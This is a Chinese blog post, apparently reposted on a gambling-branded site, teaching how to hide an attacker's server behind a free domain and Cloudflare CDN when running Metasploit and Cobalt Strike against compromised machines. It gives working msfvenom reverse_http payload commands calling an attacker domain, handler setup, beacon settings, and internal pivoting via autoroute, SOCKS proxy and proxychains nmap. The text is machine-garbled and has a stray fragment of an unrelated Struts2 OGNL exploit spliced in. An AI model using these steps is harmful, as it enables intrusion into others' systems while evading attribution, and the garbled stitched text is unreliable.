反溯源-cs和msf域名上线 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

反溯源-cs和msf域名上线

申博_安全预警 申博 82次浏览 未收录 0个评论

媒介

在拿下了目的机以后,目的机在内网内里,运用用msf或许CS时,用VPS做效劳器的话,会致使本身的VPS的IP泄漏,很轻易被溯源。

反溯源-cs和msf域名上线

最快最稳的体式格局固然照样找跳板,固然我这类严格遵守收集安全法的好孩子是不可能有肉鸡做跳板的。

思来想去,查阅了一些材料后发明,域名上线走CDN是个不错的挑选。

因而在研讨了一段时间以后,写下了这篇文章。

正文

域名和CDN设置

须要的东西:一台外洋的VPS 这里我引荐vultr (腾讯云和阿里云等国内的VPS是不支撑免备案的)

说到域名上线,天然就不能老老实实的去用本身备案了的域名,不然又是一个就地拘系。

到这里https://freenom.com/ 注册一个免费且不必备案的的tk域名

这里假如注册失利,检查一下是不是是邮箱不对,由于它不支撑一些邮箱如163,126邮箱等,能够用gmail注册。

到这里https://www.cloudflare.com/ 你能够搞到一个免费的CDN

为何我屡次强调免费呢?固然是由于贫困、

反溯源-cs和msf域名上线

注册完freenom和cloudflare的账号以后

在freenom的Nameservers里填上cloudflare所提醒的设置信息以下

反溯源-cs和msf域名上线

不要用freenom自带的域名剖析,由于它自带的没上CDN ping一下域名就晓得VPS ip了

在cloudflare内里设置一个A类的剖析 就是vps的ip

反溯源-cs和msf域名上线

然后域名设置的事就算完成了。

这个时刻,我ping我域名,剖析的ip是CDN的,从而隐蔽了我的实在ip。

域名上线

注意事项

Cloudflare有个特性,假如用其他端口的话,是监听不到的

Cloudflare支撑的HTTP端口是:

80,8080,8880,2052,2082,2086,2095

Cloudflare支撑的HTTPs端口是:

443,2053,2083,2087,2096,8443

MSF域名上线

起首天生一个meterpreter

日常平凡我们用的比较多的是reverse_tcp,在这里我们要用的是reverse_http

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=cs.XXXX.tk LPORT=2095 -f exe > shell.exe

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=cs.XXXX.tk LPORT=2095 -f exe > shell.exe

上传到靶机内里运转,VPS监听

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_http
set lhost cs.XXXX.tk
set LPORT 2095
run

假如在过程当中碰到msfconsole关于allocate memory – infocmp,处理方案为

出自 https://www.optiv.com/blog/create-a-budget-friendly-virtual-private-server-with-a-metasploit-instance

浅谈struts2破绽防护与绕过-中

S2-033 & S2-037 S2-033和s2-037的区别是,是否需要开启动态方法调用这两个漏洞产生的点差不多,只不过s2-033的点需要allowDynamicMethodCalls为TRUE,s2-037不需要,具体看下面分析 什么是REST呢 1. REST描述的是在网络中client和server的一种交互形式;REST本身不实用,实用的是如何设计 RESTful API(REST风格的网络接口);
2. Server提供的RESTful API中,URL中只使用名词来指定资源,原则上不使用动词。“资源”是REST架构或者说整个网络处理的核心。 poc #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#xx=123,#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Ru

root@vultr:~# cd /var
root@vultr:/var# touch swap.img
root@vultr:/var# chmod 600 swap.img
root@vultr:/var# dd if=/dev/zero of=/var/swap.img bs=1024k count=1000
root@vultr:/var# mkswap /var/swap.img
root@vultr:/var# swapon /var/swap.img

这时候不出不测我们应当得到了一个session,这时候在实行一些操纵的时刻,靶机用wireshark抓包,看流量

反溯源-cs和msf域名上线

反溯源-cs和msf域名上线

看到的IP是来自CDN 104.24.117.1我们的VPS地点得到了有用的隐蔽,假如想处理环境有歹意域名检测的话,

那末能够用域前置的体式格局来处理这个题目,这个已经有很多大佬写了这方面的文章,我这里就不逐一形貌了。

引荐浏览 https://xz.aliyun.com/t/4509

CS域名上线

payload选 windows/beacon_http/reverse_http

主机填域名
反溯源-cs和msf域名上线
端口填上面CF支撑的恣意http端口

天生木马,靶机运转木马,

实行一些操纵,靶机抓包,检察流量。

反溯源-cs和msf域名上线

反溯源-cs和msf域名上线

CS内里也胜利的隐蔽了VPS的IP

测试

厥后我在想tcp和http的meterpreter会不会存在很多不一样的处所

会不会在内网渗入的时刻代办失利

因而我最先做了一点简朴的测试

环境

虚拟机 192.168.20.141
本机 10.11.2.225
路由器 10.11.2.128 存在一个web效劳
公网vps

反溯源-cs和msf域名上线
VPS监听来自虚拟机的meterpreter

来测试一下可否扫到路由器的web效劳

run autoroute -s 10.11.2.0 -n 255.255.255.0  //增加一个路由 
background
use auxiliary/scanner/http/title
set rhosts 10.11.2.0/24
run

速率上有点慢,但照样扫出了效果

[+] [10.11.2.128:80] [C:200] [R:] [S:EUHTϞП·ԉǷ] EUHTϞП·ԉǷ

尝试挂代办扫描

use auxiliary/server/socks4a
run

编辑/etc/proxychains.conf 末了一行加上

socks4 0.0.0.0 1080

经由过程代办用nmap来扫描内网的web效劳

proxychains4 nmap -sT -Pn -p445,80 --open 10.11.2.0/24

[proxychains] Strict chain  ...  0.0.0.0:1080  ...  10.11.2.128:80  ...  OK
[proxychains] Strict chain  ...  0.0.0.0:1080  ...  10.11.2.225:445  ...  OK

Nmap scan report for 10.11.2.128
Host is up (6.9s latency).
Not shown: 1 closed port
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 10.11.2.225
Host is up (8.5s latency).
Not shown: 1 closed port
PORT    STATE SERVICE
445/tcp open  microsoft-ds

胜利的扫描到了我的物理机和路由器,

申明用域名上线走CDN的meterpreter,也是能够实行一些内网渗入方面的内容,固然,速率上觉得比tcp的慢了很多。

至于tcp和http差别体式格局上线,是不是会致使某些msf模块没法运用,须要在后续的过程当中逐步探索,我只发明了有很多模块http和tcp都没法经由过程代办的体式格局运用,如nmap的ping存活扫描,arp扫描等。

以上就是我最近在cs和msf域名上线上进修的一点心得体会,谢谢列位师傅的浏览。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明反溯源-cs和msf域名上线
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址